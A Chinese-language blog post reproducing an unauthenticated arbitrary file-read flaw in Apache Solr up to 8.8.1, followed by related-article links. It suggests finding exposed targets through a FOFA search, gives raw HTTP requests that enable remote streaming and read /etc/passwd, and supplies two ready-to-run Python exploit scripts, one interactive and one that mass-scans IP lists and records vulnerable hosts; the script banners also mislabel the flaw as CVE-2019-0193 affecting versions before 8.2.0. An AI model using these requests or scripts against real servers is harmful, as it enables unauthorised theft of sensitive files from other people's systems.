Apache Solr任意文件读取漏洞复现

最新推荐文章于 2024-05-12 14:14:04 发布
最新推荐文章于 2024-05-12 14:14:04 发布
阅读量2.5k 收藏 4
点赞数 2
分类专栏: 漏洞复现 文章标签: solr 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/deng_menglihua/article/details/115006866
版权

Apache Solr 任意文件读取漏洞

一.漏洞描述

Apache Solr 存在任意文件读取漏洞,攻击者可以在未授权的情况下获取目标服务器敏感文件。

二.影响版本

Apache Solr <= 8.8.1

三.漏洞复现

1.搭环境

下载Solr
https://mirrors.ukfast.co.uk/sites/ftp.apache.org/lucene/solr/8.8.1/solr-8.8.1.tgz

也可以使用fofa大法,搜索 app=“Solr”

访问目标

2.获取core的信息

访问:
http://ip:8983/solr/admin/cores?indexInfo=false&wt=json
获取关键词:acdbcategories
]

3.发送请求

使用burp发送以下请求包,ip要对应:

GET /solr/acdbcategories/config HTTP/1.1
Host: ip:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-type:application/json
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 82

{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}

结果:
在这里插入图片描述

4.文件读取

也是使用burp发送请求包:

GET /solr/acdbcategories/debug/dump?param=ContentStreams HTTP/1.1
Host: ip:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 29

stream.url=file:///etc/passwd

结果如下,成功读取到/etc/passwd中的信息:
在这里插入图片描述

5.脚本使用

import requests
import sys
import random
import re
import base64
import time
from lxml import etree
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning

def title():
    print('+------------------------------------------')
    print('+  \033[34mVersion: Apache Solr < 8.2.0            \033[0m')
    print('+  \033[36m使用格式: python3 CVE-2019-0193.py       \033[0m')
    print('+  \033[36mUrl    >>> http://xxx.xxx.xxx.xxx:8983  \033[0m')
    print('+  \033[36mFile   >>> 文件名称或目录                  \033[0m')
    print('+------------------------------------------')

def POC_1(target_url):
    core_url = target_url + "/solr/admin/cores?indexInfo=false&wt=json"
    try:
        response = requests.request("GET", url=core_url, timeout=10)
        core_name = list(json.loads(response.text)["status"])[0]
        print("\033[32m[o] 成功获得core_name,Url为:" + target_url + "/solr/" + core_name + "/config\033[0m")
        return core_name
    except:
        print("\033[31m[x] 目标Url漏洞利用失败\033[0m")
        sys.exit(0)

def POC_2(target_url, core_name):
    vuln_url = target_url + "/solr/" + core_name + "/config"
    headers = {
        "Content-type":"application/json"
    }
    data = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
        print("\033[36m[o] 正在准备文件读取...... \033[0m".format(target_url))
        if "This" in response.text and response.status_code == 200:
            print("\033[32m[o] 目标 {} 可能存在漏洞 \033[0m".format(target_url))
        else:
            print("\033[31m[x] 目标 {} 不存在漏洞\033[0m".format(target_url))
            sys.exit(0)

    except Exception as e:
        print("\033[31m[x] 请求失败 \033[0m", e)

def POC_3(target_url, core_name, File_name):
    vuln_url = target_url + "/solr/{}/debug/dump?param=ContentStreams".format(core_name)
    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }
    data = 'stream.url=file://{}'.format(File_name)
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
        if "No such file or directory" in response.text:    
            print("\033[31m[x] 读取{}失败 \033[0m".format(File_name))
        else:
            print("\033[36m[o] 响应为:\n{} \033[0m".format(json.loads(response.text)["streams"][0]["stream"]))


    except Exception as e:
        print("\033[31m[x] 请求失败 \033[0m", e)

if __name__ == '__main__':
    title()
    target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
    core_name = POC_1(target_url)
    POC_2(target_url, core_name)
    while True:
        File_name = str(input("\033[35mFile >>> \033[0m"))
        POC_3(target_url, core_name, File_name)

运行结果:

6.批量测试目标是否存在

与其相同目录下新建一个1.txt文件,在1.txt中存放需要测试的url,并运行脚本,会生成url.txt的文件,文件中就是存在漏洞的url。

import requests
import sys
import random
import re
import base64
import time
from lxml import etree
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning
a=[]
def title():
    print('+------------------------------------------')
    print('+  \033[34mVersion: Apache Solr < 8.2.0            \033[0m')
    print('+  \033[36m使用格式: python3 poc.py               \033[0m')
    print('+  \033[36mUrl    >>> http://xxx.xxx.xxx.xxx:8983  \033[0m')
    print('+  \033[36mFile   >>> 文件名称或目录                  \033[0m')
    print('+------------------------------------------')

def POC_1(target_url):
    core_url = target_url + "/solr/admin/cores?indexInfo=false&wt=json"
    try:
        response = requests.request("GET", url=core_url, timeout=2)
        core_name = list(json.loads(response.text)["status"])[0]
        print("\033[32m[o] 成功获得core_name,Url为:" + target_url + "/solr/" + core_name + "/config\033[0m")
        return core_name
    except:
        print("\033[31m[x] 目标Url漏洞利用失败\033[0m")
        return 1

def POC_2(target_url, core_name):
    vuln_url = target_url + "/solr/" + core_name + "/config"
    headers = {
        "Content-type":"application/json"
    }
    data = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
        print("\033[36m[o] 正在准备文件读取...... \033[0m".format(target_url))
        if "This" in response.text and response.status_code == 200:
            print("\033[32m[o] 目标 {} 可能存在漏洞 \033[0m".format(target_url))
        else:
            print("\033[31m[x] 目标 {} 不存在漏洞\033[0m".format(target_url))
            return 1

    except Exception as e:
        print("\033[31m[x] 请求失败 \033[0m", e)

def POC_3(target_url, core_name, File_name):
    vuln_url = target_url + "/solr/{}/debug/dump?param=ContentStreams".format(core_name)
    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }
    data = 'stream.url=file://{}'.format(File_name)
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
        if "No such file or directory" in response.text:    
            print("\033[31m[x] 读取{}失败 \033[0m".format(File_name))
            print(response.text)
        else:
            if 'root' in response.text:
                print(target_url)
                with open('./url.txt','a') as f:
                    f.write(target_url+'\n')
                print("\033[36m[o] 响应为:\n{} \033[0m".format(json.loads(response.text)["streams"][0]["stream"]))


    except Exception as e:
        print("\033[31m[x] 请求失败 \033[0m", e)

if __name__ == '__main__':
    title()
    with open('1.txt', 'r', encoding='utf-8') as f:
        g=f.read()
    a=re.findall('\d{1,3}[.]\d{1,3}[.]\d{1,3}[.]\d{1,3}[:]\d+',g)
    print(a)
    for i in a:
        if 'http' in i:
            target_url = str(i)
        else:
            target_url = 'http://'+str(i)
        print(target_url)
        core_name = POC_1(target_url)
        print(core_name)
        if str(core_name)=='1':
            print(22)
            continue
        b=POC_2(target_url, core_name)
        if str(b)=='1':
            continue
        File_name = str('/etc/passwd')
        POC_3(target_url, core_name, File_name)

四、修复建议

将 Solr 端口仅对内网开放,并配置访问策略
无修复版本(好像是官方拒绝修复)

  • 欢迎大家评论交流
Bin_少年
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
Apache Solr RemoteStreaming 文件读取
weixin_51387754的博客
11-12 1062
漏洞简介 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果. Apache Solr 是一个开源的搜索服务器。在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或任意文件读取. 漏洞 环境使用kali+docker (root????guiltyfet)-[/ho
CVE-2021-44548 Apache Solr 敏感信息泄露漏洞分析及
蚁景网安学院
05-19 807
2021年12月18日,Apache发布安全公告,Apache Solr中存在一个信息泄露漏洞(CVE-2021-44548),该漏洞影响了8.11.1之前的所有Apache Solr版本(仅影响Windows平台)。Apache Solr的DataImportHandler中存在一个不正确的输入验证漏洞,可利用Windows UNC路径从Solr主机调用网络上的另一台主机的SMB服务,或导致SMB攻击。
其他的 框架安全:Apache Solr 远程代码漏洞.(CVE-2019-0193)
最新发布
网络安全领域___专研者.
05-12 645
Apache Solr是一个开源的搜索服务,便用Java语言开发,主要基于 HTTP 和ApacheLucene 实的。Sor是一个高性能,采用Java5开发,基于Lucene的全文搜索服务器。
Apache Solr 8.1.1和8.2.0版本 JMX服务远程代码执行漏洞(CVE-2019-12409)
weixin_44047654的博客
02-14 533
Apache Solr 8.1.1和8.2.0版本 JMX服务远程代码执行漏洞(CVE-2019-12409)
Solr搜索引擎详细教程及Java API使用(SolrJ-8.11)
REID丶Beginner的博客
07-20 5188
一、Solr安装 在 Unix 兼容或 Windows 服务器上安装 Solr 通常需要简单地提取(或解压)下载包。请务必在 Solr 安装前准备好一下必备环境(如:jdk )。 番外篇:很多人在安装 Solr 会纠结 Tomcat 和 Jetty 怎么选,都说 Solr 内置的 Jetty 不稳定有问题; 1、下载 Solr 安装包。 Solr 可从 Solr 网站获得:最新版 Solr 下载。 有三个独立的包: solr-8.11.0.tgz适用于 Linux/Unix/O...
Apache Solr RemoteStreaming 任意文件读取
Li-D的博客
06-07 370
漏洞描述 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。 Apache Solr是一个开源搜索服务引擎,攻击者可以在未授权的情况下构造恶意HTTP请求读取目标Apache Solr服务器的任意文件。 影响版本 Apache Solr <= 8.8.1 环境搭建 开启docker-compose环
Apache Solr 任意文件读取.py
06-07
Apache Solr RemoteStreaming 任意文件读取和SSRF
Apache-Solr-EXP:Apache Solr任意文件读取EXP
03-20
这个“Apache-Solr-EXP”项目关注的是一个特定的安全漏洞,即Apache Solr任意文件读取漏洞。该漏洞允许攻击者通过精心构造的请求访问服务器上的任意文件,这可能对系统的安全性构成严重威胁。 在Python 3.8或更高...
Apache Solr最新版任意文件读取0day1
08-03
Apache Solr 是一个流行的开源全文搜索引擎,...总之,Apache Solr任意文件读取漏洞是值得注意的安全问题,尤其是在默认配置下运行的系统。为了系统的安全性,管理员应该实施严格的访问控制策略,并保持软件的更新。
Apache Solr 代码执行漏洞应急响应通告
05-05
Apache Solr 代码执行漏洞应急响应通告
Apache Solrsolr-7.7.3.tgz)
02-05
7. **LICENSE** 和 **NOTICE**: 这些文件提供了关于Apache Solr的许可和版权信息。 在部署和使用Solr时,你需要知道如何配置Solr核心(core)以满足你的需求,这可能涉及到创建和修改`solrconfig.xml`(配置文件)...
Apache Solr 任意文件读取漏洞
dahege666的博客
05-10 2108
环境搭建 下载后解压,然后把server中的JAR拷贝到example中然后CMD打开bin目录下的solr.cmd,访问 http://ip:8093(默认) Apache Solr简介 Apache Solr是一个开源的搜索服务,使用Java语言开发,主要基于HTTP和Apache Lucene实的。它是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提
任意文件读取漏洞
来日可期的博客
08-31 3315
任意文件上传漏洞指的是攻击者可以通过绕过应用程序的文件上传功能,向服务器上传恶意文件,包括脚本文件、木马程序等,从而执行任意代码或获取系统敏感信息。
Apache Solr漏洞总结(比较全面的哦)
热门推荐
yangbz123的博客
06-11 1万+
目录框架概述Wiki百科百度百科漏洞列表1.远程命令执行RCE(CVE-2017-12629)漏洞详情漏洞影响版本修方案2.远程命令执行XXE(CVE-2017-12629)漏洞详情漏洞影响版本修方案3.任意文件读取AND命令执行(CVE-2019-17558)漏洞详情漏洞3.1代码执行3.2任意文件读取影响版本修方案4.远程命令执行漏洞(CVE-2019-0192)漏洞详情漏洞影响版本修方案5.远程命令执行漏洞(CVE-2019-0193)漏洞详情漏洞影响版本修方案6.未授权
Apache-Solr 任意文件读取漏洞
不想当脚本小子的脚本小子
03-20 663
2021.3.18新出的,无CVE编号 Apache Solr是一个开源的搜索服务,使用Java语言开发,主要基于HTTP和Apache Lucene实的。它是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果 一、漏洞描述 Apache Solr 存在任意文件读取漏洞,攻击者可以在未授权的情况下获取目标服务器敏感文.
CVE-2019-0193(Apache Solr Velocity模板注入RCE)漏洞
战神/calmness的博客
11-22 961
Apache Solr Velocity模板注入RCE漏洞 你剥开一个很酸的橙子而感到后悔了,可对于橙子来说,那是它的一切. 目录 - 简介 - 漏洞概述 - 漏洞版本 - 漏洞 - 漏洞 简介 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以...
apache log4j 2(CVE-2021-44228)漏洞
net的博客
04-04 868
这个漏洞的根本原因在于log4j的默认配置允许使用解析日志消息中的对象。攻击者可以构造恶意的日志消息,其中包含一个恶意的Java对象,当log4j尝试解析这个对象时,它将会触发漏洞,导致攻击者能够执行任意代码。然而,我们没有对用户输入进行任何过滤或验证,这意味着如果用户输入包含恶意代码,它将会被记录到日志文件中。JNDI 的一种实,允许按照具体的名称逻辑查找对象的位置,并输出对象的内容,此对象可以通过Java。协议,能从远程服务区上请求恶意的对象,对象在调用的过程中会被解析执行,导致了Log4j。
Apache Log4j2漏洞
weixin_51151498的博客
01-23 1382
Apache Log4j2漏洞
Apache-Solr任意文件读取
DUANYU23的博客
04-12 1194
Apache-Solr任意文件读取0X001前言0X002 漏洞影响 0X001前言 Solr 是一个开源的企业级搜索服务器,底层使用易于扩展和修改的Java 来实。服务器通信使用标准的HTTP 和XML Solr 主要特性有:强大的全文检索功能,高亮显示检索结果,动态集群,数据库接口和电子文档(Word ,PDF 等)的处理。而且Solr 具有高度的可扩展,支持分布搜索和索引的制。 0X002 漏洞影响 Apache Solr <= 8.8.1(最新版,目前官方以RemoteStreaming默
apache solr 7升级
12-22
Apache Solr是一款开源的搜索平台,其7版本升级带来了许多新特性和改进,使得用户能够更加高效地进行搜索和数据分析。升级到Apache Solr 7可以带来诸多好处。 首先,Solr 7提供了更好的性能和稳定性,通过优化搜索和索引速度,以及提高集群的吞吐量和并发性能,可以更好地满足大规模数据的搜索需求。同时,Solr 7还引入了基于时间的数据分析功能,可以更好地支持实时数据的处理和分析。 其次,Solr 7引入了新的查询语言和功能,包括布尔查询、近似查询、条件查询等,可以更加灵活地对数据进行搜索和过滤。同时,Solr 7还加强了对多语言和多字段搜索的支持,可以更好地满足不同语言和数据类型的搜索需求。 此外,Solr 7还提供了全新的管理界面和监控工具,可以更加方便地进行索引和集群的管理,以及实时监控集群状态和性能指标,有助于提高系统的可用性和稳定性。 总之,Apache Solr 7升级带来了更好的性能、更丰富的功能和更方便的管理工具,可以帮助用户更好地进行搜索和数据分析,提高系统的可用性和灵活性。因此,升级到Solr 7是非常值得的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值